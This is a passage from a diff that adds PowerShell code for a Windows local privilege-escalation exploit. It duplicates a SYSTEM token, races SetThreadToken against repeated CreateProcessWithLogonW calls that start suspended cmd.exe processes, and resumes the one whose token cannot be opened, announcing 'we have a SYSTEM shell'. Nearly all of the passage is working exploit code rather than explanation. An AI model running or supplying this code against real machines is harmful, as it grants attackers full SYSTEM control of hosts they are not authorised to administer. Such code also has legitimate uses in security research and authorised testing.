+		echo "`n[*] Sniffing out SYSTEM shell.."
+		echo "`n[>] Duplicating SYSTEM token"
+		$hDuplicateTokenHandle = [IntPtr]::Zero
+		$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
+		
+		# Simple PS runspace definition
+		echo "[>] Starting token race"
+		$Runspace = [runspacefactory]::CreateRunspace()
+		$StartTokenRace = [powershell]::Create()
+		$StartTokenRace.runspace = $Runspace
+		$Runspace.Open()
+		[void]$StartTokenRace.AddScript({
+			Param ($Thread, $hDuplicateTokenHandle)
+			while ($true) {
+				$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
+			}
+		}).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
+		$AscObj = $StartTokenRace.BeginInvoke()
+		
+		echo "[>] Starting process race"
+		# Adding a timeout (10 seconds) here to safeguard from edge-cases
+		$SafeGuard = [diagnostics.stopwatch]::StartNew()
+		while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, "C:\Windows\System32\cmd.exe", "",
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
+			
+		$hTokenHandle = [IntPtr]::Zero
+		$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
+		# If we can't open the process token it's a SYSTEM shell!
+		if (!$CallResult) {
+			echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
+			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
+			$StartTokenRace.Stop()
+			$SafeGuard.Stop()
+			Return
+		}
+			
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+		}
+		
+		# Kill runspace & stopwatch if edge-case
+		$StartTokenRace.Stop()
+		$SafeGuard.Stop()
+	}
+}
\ No newline at end of file